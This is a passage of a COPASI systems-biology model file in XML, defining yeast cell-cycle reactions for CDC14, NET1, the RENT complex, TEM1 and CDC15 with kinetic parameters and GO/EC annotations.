<ListOfSubstrates>
<Substrate metabolite="Metabolite_85" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_83" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4235" name="Jacdh" value="1"/>
<Constant key="Parameter_4236" name="Vacdh" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_105">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_648">
<SourceParameter reference="Metabolite_85"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_641">
<SourceParameter reference="ModelValue_40"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_646">
<SourceParameter reference="ModelValue_160"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_650">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_4" name="Inactivation_3" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_4">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:2.7.11.22" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0001100" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004693" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006468" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_83" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_85" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4237" name="Jicdh" value="1"/>
<Constant key="Parameter_4241" name="Vicdh" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_106">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_652">
<SourceParameter reference="Metabolite_83"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_647">
<SourceParameter reference="ModelValue_47"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_651">
<SourceParameter reference="ModelValue_161"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_654">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_3" name="CDC14 synthesis" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_3">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0006412" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_21" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4242" name="ks14" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_107">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_644">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_655">
<SourceParameter reference="ModelValue_121"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_2" name="CDC14 degradation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_2">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_21" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4240" name="kd14" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_108">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_656">
<SourceParameter reference="Metabolite_21"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_658">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_649">
<SourceParameter reference="ModelValue_73"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_1" name="Assoc. with NET1 to form RENT" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_1">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0005515" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0030869" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0043623" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_21" stoichiometry="1"/>
<Substrate metabolite="Metabolite_123" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_137" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4246" name="kasrent" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_109">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_653">
<SourceParameter reference="Metabolite_21"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_663">
<SourceParameter reference="Metabolite_123"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_661">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_659">
<SourceParameter reference="ModelValue_70"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_0" name="Dissoc. from RENT" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_0">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0043624" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_137" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_123" stoichiometry="1"/>
<Product metabolite="Metabolite_21" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4245" name="kdirent" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_110">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_660">
<SourceParameter reference="Metabolite_137"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_665">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_664">
<SourceParameter reference="ModelValue_96"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_88" name="Assoc with NET1P to form RENTP" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_88">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0005515" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0030869" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0043623" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_21" stoichiometry="1"/>
<Substrate metabolite="Metabolite_125" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_139" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4244" name="kasrentp" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_111">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_662">
<SourceParameter reference="Metabolite_21"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_670">
<SourceParameter reference="Metabolite_125"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_668">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_666">
<SourceParameter reference="ModelValue_71"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_89" name="Dissoc. from RENP" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_89">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0043624" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_139" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_21" stoichiometry="1"/>
<Product metabolite="Metabolite_125" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4239" name="kdirentp" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_112">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_667">
<SourceParameter reference="Metabolite_139"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_672">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_671">
<SourceParameter reference="ModelValue_97"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_90" name="Net1 synthesis" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_90">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0006412" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_123" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4238" name="ksnet" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_113">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_669">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_673">
<SourceParameter reference="ModelValue_139"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_91" name="Net1 degradation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_91">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_123" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4243" name="kdnet" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_114">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_675">
<SourceParameter reference="Metabolite_123"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_677">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_674">
<SourceParameter reference="ModelValue_99"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_92" name="Net1P degradation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_92">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_125" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4247" name="kdnet" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_115">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_657">
<SourceParameter reference="Metabolite_125"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_680">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_678">
<SourceParameter reference="ModelValue_99"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_93" name="NET1 phosphorylation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_93">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:2.7.11.1" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004672" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006468" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0031536" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_123" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_125" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4389" name="Vkpnet" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_116">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_676">
<SourceParameter reference="Metabolite_123"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_681">
<SourceParameter reference="ModelValue_163"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_683">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_94" name="dephosphorylation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_94">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:3.6.1.11" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004309" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006470" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_125" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_123" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4391" name="Vppnet" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_117">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_679">
<SourceParameter reference="Metabolite_125"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_684">
<SourceParameter reference="ModelValue_162"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_686">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_95" name="RENT phosphorylation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_95">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:2.7.11.1" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004672" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006468" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0031536" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_137" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_139" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4392" name="Vkpnet" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_118">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_682">
<SourceParameter reference="Metabolite_137"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_687">
<SourceParameter reference="ModelValue_163"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_689">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_96" name="dephosphorylation_2" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_96">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:3.6.1.11" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004309" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006470" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_139" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_137" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4390" name="Vppnet" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_119">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_685">
<SourceParameter reference="Metabolite_139"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_690">
<SourceParameter reference="ModelValue_162"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_692">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_97" name="Degradation of NET1 in RENT" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_97">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_137" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_21" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4393" name="kdnet" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_120">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_688">
<SourceParameter reference="Metabolite_137"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_695">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_693">
<SourceParameter reference="ModelValue_99"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_98" name="Degradation of NET1P in RENTP" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_98">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_139" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_21" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4507" name="kdnet" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_121">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_691">
<SourceParameter reference="Metabolite_139"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_698">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_696">
<SourceParameter reference="ModelValue_99"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_99" name="Degradation of CDC14 in RENT" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_99">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_137" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_123" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4508" name="kd14" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_122">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_694">
<SourceParameter reference="Metabolite_137"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_701">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_699">
<SourceParameter reference="ModelValue_73"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_100" name="Degradation of CDC14 in RENTP" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_100">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_139" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_125" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4278" name="kd14" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_123">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_697">
<SourceParameter reference="Metabolite_139"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_704">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_702">
<SourceParameter reference="ModelValue_73"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_101" name="TEM1 activation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_101">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0005515" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0005525" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0031536" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_155" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_157" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_115" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4277" name="Jatem" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_124">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_707">
<SourceParameter reference="ModelValue_44"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_705">
<SourceParameter reference="Metabolite_115"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_709">
<SourceParameter reference="Metabolite_155"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_700">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_102" name="inactivation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_102">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0005096" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0005515" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0007094" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_157" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_155" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_45" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4382" name="Jitem" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_125">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_710">
<SourceParameter reference="Metabolite_45"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_711">
<SourceParameter reference="ModelValue_51"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_713">
<SourceParameter reference="Metabolite_157"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_706">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_103" name="CDC15 activation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_103">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:2.7.11.1" />
<rdf:li rdf:resource="urn:miriam:ec-code:3.1.3.48" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004721" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006470" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0031536" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_9" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_13" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_155" stoichiometry="1"/>
<Modifier metabolite="Metabolite_157" stoichiometry="1"/>
<Modifier metabolite="Metabolite_21" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4381" name="ka15_p" value="1"/>
<Constant key="Parameter_4289" name="ka15_p_p" value="1"/>
<Constant key="Parameter_4288" name="ka15p" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_126">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_723">
<SourceParameter reference="Metabolite_21"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_725">
<SourceParameter reference="Metabolite_9"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_703">
<SourceParameter reference="Metabolite_155"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_719">
<SourceParameter reference="Metabolite_157"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_715">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_714">
<SourceParameter reference="ModelValue_55"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_717">
<SourceParameter reference="ModelValue_56"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_721">
<SourceParameter reference="ModelValue_57"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_104" name="inactivation_2" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_104">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-05-07T16:14:52Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:isVersionOf>
